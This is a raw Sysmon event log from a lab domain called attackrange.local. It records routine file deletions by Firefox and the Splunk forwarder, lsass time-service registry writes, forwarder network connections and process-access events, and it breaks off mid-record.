07:48:55.868{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=961B093941269A41F1D1D5F6137468C7,SHA256=DE38CFDDC678CCA1F379B4A779FDFEF88A7A6352BE7BFFE0EE49845B7DD3856A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047647Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:55.868{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=14E5088BB640FA8EA3C1ED313CE526FD,SHA256=139FDD0B6C56C8A3127E6ABCA7AC0D666121D969C99AB4A1DDAA490381278523,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047646Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:55.868{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=31EC7F97E15CE98B3710937E1D43DFF4,SHA256=DD655C9E899C04E0417FF8713C51FE5800FA4D570CA220EC9C21382C382F4CB3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047645Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:55.868{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=98AAAA1F822F649AFFA47B9BFA2223DB,SHA256=CDF95185817F307C0F4BA91A90F543EDC8284B576472E89E327DB409ECAFC0C6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047644Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:55.868{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=DD9C7EE2557C4365F12D9B9D384A6589,SHA256=633AE17EE1F01217378C66148114DEE00FD66C8D09F1C08E102187D389E572BE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047643Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:55.868{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=205B7C820413DBB0194B41EB63ECAB1C,SHA256=79E66B871490AE05C0FC32D33BC97A3940F6532DBD361FC1F36930CA4A816D4B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047642Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:55.868{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=D1E79EBE5F248C041C2A6AF28C00279D,SHA256=407A50F15604FE3BE5031FD8A73F6A1C20773CC7E72EA474D75764AFAAA2F694,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047641Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:55.569{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=78168E5F93942C0469CABB8B944EF9D9,SHA256=25A254D8E3F886EABEC8520084EF90BC161C6FC9D39314F2B945979DCC487D98,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806950Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:55.266{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5228718D47203D548DB9629BC8CEBEDD,SHA256=74459FEC6EECF50610CBFD0CF38C9A4AE3459B36F2A6F6A0B6B90FA3FF2E0622,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047640Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:55.069{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=087864088BAAC4C140C0E82992275324,SHA256=B374A8D681AF6EEC5EA9F8ADAA903F4FDBE6EC5400E5115CA803DEBCE64CCDAF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047655Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:56.868{466BC892-02BC-60E8-2A00-00000000CF01}2928NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047654Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:56.583{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3EFF91E2D040257339C21DAFDDF05EBC,SHA256=51D6C3A71D0DAA9651FB8CEEDC4E278B86DAE2CA020F5FECA5589A29B5FABEA3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806951Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:56.282{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B398680975E719EFFA76C3CDC087C35,SHA256=339F08135587A8418A8E1668FD27C2BF11C2C9D135144BF8560A7FC3B52F9A0B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047656Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:57.618{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B915A420F849C1344D7100B5430CFC87,SHA256=A175161F097026F336BBCF2C8788CC104726E8BB1129ED35F41B769D9EBD37DA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806952Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:57.360{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43B959DE59D0580C356CF7359508F405,SHA256=DA2FF5EE3A12BE57B9B9FA8D17130CA80E6BF53152BB1B0100EC5146D6A4A669,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806954Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:57.227{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57221-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806953Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:58.391{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA1592DB1F34AE369552088296E4B0EF,SHA256=EE0851A0228297B0C5F7B4D5F52504901B5910FC00ECB76EEA6DBC4A39AF4526,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047658Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:58.635{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC0784EF7150DB64FE9DF971DFA105D9,SHA256=19609CF3F0BDA82EB75A870CA76D4305643C913E2FDCA9FCE88E55AF81481B08,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047657Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:58.098{466BC892-5A42-60E8-C510-00000000CF01}7816ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exeC:\Users\bob\AppData\Local\Microsoft_Corporation\powershell_ise.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\7816.xml~RFf66480f.TMPMD5=4553D3891EC8198EC956E59A7FA89664,SHA256=7DA31B28073EC76DCCA7EDFC3709014058FE36DCB6626D30538493EE344D57A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047670Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:59.650{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B8C50E283B0FB853B158CA2E23A33CF,SHA256=667A0079E5B24F8F947238C594D6590CAB40C62F1160FBA54A10A4545568AA77,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806955Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:59.422{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EAC67D0CA211A6FBA1578D285BB94CBB,SHA256=D08CB436F71D9A19A08ADE3EBCBD1BA6BE0DA0903F35A4DCD54D44C3121C78CB,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001047669Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:48:59.613{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x80000000000000001047668Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:48:59.613{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0f664dfb) 13241300x80000000000000001047667Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:48:59.613{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d776e9-0xfdc3c6fc) 13241300x80000000000000001047666Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:48:59.613{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d776f2-0x5f882efc) 13241300x80000000000000001047665Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:48:59.613{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d776fa-0xc14c96fc) 13241300x80000000000000001047664Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:48:59.613{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x80000000000000001047663Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:48:59.613{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0f664dfb) 13241300x80000000000000001047662Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:48:59.613{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d776e9-0xfdc3c6fc) 13241300x80000000000000001047661Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:48:59.613{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d776f2-0x5f882efc) 13241300x80000000000000001047660Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:48:59.613{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d776fa-0xc14c96fc) 354300x80000000000000001047659Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:50.403{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50977-false10.0.1.12-8089- 23542300x80000000000000001047676Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:00.653{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EEC995D73A4B834F78BA6F722402FC57,SHA256=6F2A0FA39C664A7B98EAE533BEACB59B7D2BD4F35BB59C0129D7A36EA990610A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806956Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:00.454{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=46A7B211C7A36310EC764BEAC02FED94,SHA256=CCF4D2E8D9DBCD7DBF1BA246E8424AC1C284B425ACA4ED5D966155FC3DEFEA7B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047675Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:00.621{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1549f7|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000001047674Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:00.621{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+154962|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000001047673Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:00.621{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f 10341000x80000000000000001047672Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:00.621{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336 23542300x80000000000000001047671Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:00.621{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms~RFf6651e3.TMPMD5=FEEDDF0B48ACBAE2DF2C13E094BA61E1,SHA256=564E4AC53FEF38F8EC2ADC3773CA3AE2E546D9CF626CDED40CA8B8DCCA4D789B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047680Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:01.669{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A60191D34D354DC5F9560042B03FDD7D,SHA256=D7C3419A6732F9B4B3A1C884783FA2BE667B26878B9D1A99565CE5C57BF88FE0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806957Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:01.469{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F59F7BD38EF1F2F6977D39543F18AC0B,SHA256=C5CB87997182C95A92DEA94527D403046DD9BC25157C66F363231D3553C2DA1B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047679Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:01.601{466BC892-02AF-60E8-0D00-00000000CF01}900696C:\Windows\system32\svchost.exe{466BC892-3462-60E8-100C-00000000CF01}8944C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047678Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:01.601{466BC892-02AF-60E8-0D00-00000000CF01}900696C:\Windows\system32\svchost.exe{466BC892-3462-60E8-100C-00000000CF01}8944C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001047677Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:51.601{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50978-false10.0.1.12-8000- 23542300x80000000000000001047681Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:02.699{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C5644408403DBC1D7D899809EEC1F9C,SHA256=3DB53578530B6431834C21D30415561C69DE3142B41DD60D1352D3EC12763BBA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806958Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:02.485{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E229358CFA231A95AB48B91506750AF0,SHA256=CAD07B151610BD3EC50C8BB0389CDE4E70A8986B34EBC43D4A6369547DC19FAE,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806960Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:02.352{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57222-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806959Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:03.501{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C515D2DD2F6E8DD2D849D7F6975AF34,SHA256=90665A352FFA6E0DACF72B14915832DCFCAFA78CA9AEB398F09569F6AC28EE85,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047682Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:03.736{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D13361760D6428E68C6B8725B673BFC,SHA256=86BA8320312C84073702EBA1DDE1F3BD1D0DDF9FAED643368847D52ABBB960E2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047683Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:04.751{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=568C5BF05CF10BB60FE1EC52806F8937,SHA256=F28D966B7CD3112FA77A5C769DAEEB0A41FD3F9AC3A2D58FB9AD94F2F84FABB8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806961Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:04.547{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 